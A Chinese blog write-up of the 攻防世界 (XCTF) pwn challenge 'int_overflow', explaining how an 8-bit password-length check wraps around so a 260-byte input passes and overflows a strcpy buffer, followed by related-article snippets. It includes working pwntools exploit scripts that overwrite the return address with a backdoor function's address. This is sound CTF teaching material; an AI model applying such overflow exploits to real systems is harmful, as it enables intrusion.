[攻防世界 pwn]——int_overflow

最新推荐文章于 2023-10-31 12:53:03 发布
最新推荐文章于 2023-10-31 12:53:03 发布
阅读量275 收藏 1
点赞数
分类专栏: # 攻防世界 # 整数溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/113872627
版权

[攻防世界 pwn]——int_overflow

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    在这里插入图片描述
    checksec一下,开启了NX
    在这里插入图片描述
    在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所以256就是0, 260就是4
    在这里插入图片描述
from pwn import *
p = remote("111.200.241.244",47527)
p = process("./pwn")
sys_addr = 0x0804868B
p.sendlineafter("Your choice:", '1')
p.sendlineafter("Please input your username:\n",'peak')
payload = 'a' * 24 + p32(sys_addr)
payload = payload.ljust(260, 'a')
p.sendlineafter("Please input your passwd:\n",payload)
p.interactive()
攻防世界 int_overflow
09-28 823
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 356
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 330
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
攻防世界-int_overflow
qq_45771413的博客
04-27 345
查看保护 IDA 先查看字符串搜索下有无可利用字符串,找到了cat flag。进入发现直接是system cat flag。看来只需要跳转到这个地址就可以了(0x8048694) 开始只能选择1.login登录,进入后提示输入用户名和密码。这里用户名限制死25位,没有操作空间,密码可以输入409位,插个眼。 最后还有个check passwd函数: 判断输入函数长度是否大于3小于8 然后将输入的密码拷贝给dest。 题目提示int_overstack,明晃晃地告诉我是整型溢出。我的关注重点就放在in
攻防世界 新手区 int_overflow
winterze的博客
04-04 397
攻防世界 新手区 整数溢出 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/int_overflow' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0...
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1897
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
攻防世界 pwn 新手练习区 int_overflow
ChaoYue_miku的博客
07-07 1156
题目描述:菜鸡感觉这题似乎没有办法溢出,真的么? ** 0、使用checksec检查保护,尝试打开文件 ** 开启了NX保护和部分RELRO,而且是一个32位文件 chmod +x filename 是获取执行权限的命令 执行文件发现有两处输入:用户名和密码 题目提示已经很明显了,整数溢出 ** 1、使用IDA 32 Pro打开文件 ** 查看main函数 输入1之后会执行login()函数,我们跟进查看login()函数 两个read()函数都不存在栈溢出,之后还有一个check_passwd()函
攻防世界(pwn)echo_back + magic (_IO_FILE文件流攻击初探)
PLpa的博客
03-14 1449
前言: 这两题都是关于_IO_FILE文件流攻击的题目,如果对_IO_FILE文件流不是很清楚,可以看ctfwiki中的_IO_FILE介绍——传送门。 echo_back——关于_IO_2_1_stdin结构的利用 文件保护全开,不能got覆写。 进入IDA,发现程序有两个功能,一个是setname,一个是echo back。 查看setname功能,发现此功能只能输入7个字节,不具备RO...
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 533
[攻防世界]int_overflow巨细
攻防世界 int_overflow 超超超详细
PushSafe
10-23 3095
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
攻防世界pwnint_overflow
SUOYE_GUANXING的博客
10-31 113
从汇编可以看到,想要覆盖到retn地址,需要先使用0x14 个数据覆盖stack拷贝的passed的内存区域,然后使用4字节数据覆盖ebp,再使用"cat flag"的地址覆盖返回地址,最后接上263剩余的数据即可。所以,准确来说,{256->0,257->1,258->2,259->3,260->4,261->5,262->6...264->8}235 = (263-0x14-4-4)利用整数溢出漏洞可以绕过字符串长度输入检测,但这不是最终目的,绕过长度检测后有个dest字符串,0x14字节大小。
pwn int_overflow
weixin_45677731的博客
03-15 225
32位程序,拖进ida看一下 首先,我们要输入1进入login() 输入username后再输入passwd,注意这里passwd允许我们输入的长度为0x199 再点进check_passwd 这里用v3来保存我们输入的passwd的长度,但是,这个v3是unsigned int8型的,8个字节,只能存储不超过256的数,如果超过会重新从1开始计算,这样的话,对于1个字符和257个字符,v3...
攻防世界新手区int_overflow
qq_25044201的博客
12-24 189
看题目说是个栈溢出问题,下载下来让我们看看它的权限。 发现栈不可写,心想不能用shellcode注入 用ida来看一下 发现有个后门函数,心想这题用栈溢出改变返回地址直接到后门函数这里完成得到flag 从这里目前看没有发现溢出的问题 这里同理觉得没有溢出的痕迹 这里乍一看没有问题,关键的事是 这个函数是字符串copy的,意思就是把s覆盖dest上,但是如果s的长度足够长将会导致dest溢出从而导致修改返回地址从而到达后门函数。 但是s这个长度被限制了,只有4到8之间的长度才能进行复制,不仔细一.
xctf int_overflow
pondzhang的专栏
12-09 157
from pwn import * #p = process('./int_overflow') p = remote("220.249.52.133",54612) p.recvuntil('Your choice:') p.sendline('1') p.recvuntil('username:\n') p.sendline('1') p.recvuntil('passwd:\n') payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28) #gdb.
int_overflow(xctf)
weixin_43868725的博客
05-06 622
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
day-9 xctf-int_overflow
a525024162806525的博客
09-29 382
xctf-int_overflow 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=undefined checksec文件,No canary found,32位程序: 用ida打开查看: 判断输入,选择功能菜单:1...
XCTF PWN int_overflow
prettyX的博客
06-12 257
基本信息 尝试运行 IDA F5 跟进,login()函数 继续,check_passwd()函数 对于上面的代码,关键在于v3,unsigned __int8类型 check_passwd()函数传入最大参数长度为0x199(十进制409),v3用于接收串的长度,8bit,会发生溢出 同时,下面dest长度只有14h,存在溢出 0B100000000=0X100=256,256+4=260,256+7=263,所以传入check_passwd()函数的参数需要&..
int_overflow writeup
ditto的博客
01-06 957
做了半天,没注意是整型溢出。。。 拿到题目检查下防护: 随便运行下: 放到ida里看下: 题目对输入的password的长度进行了检查,只能在4到8范围内。 在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。 发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值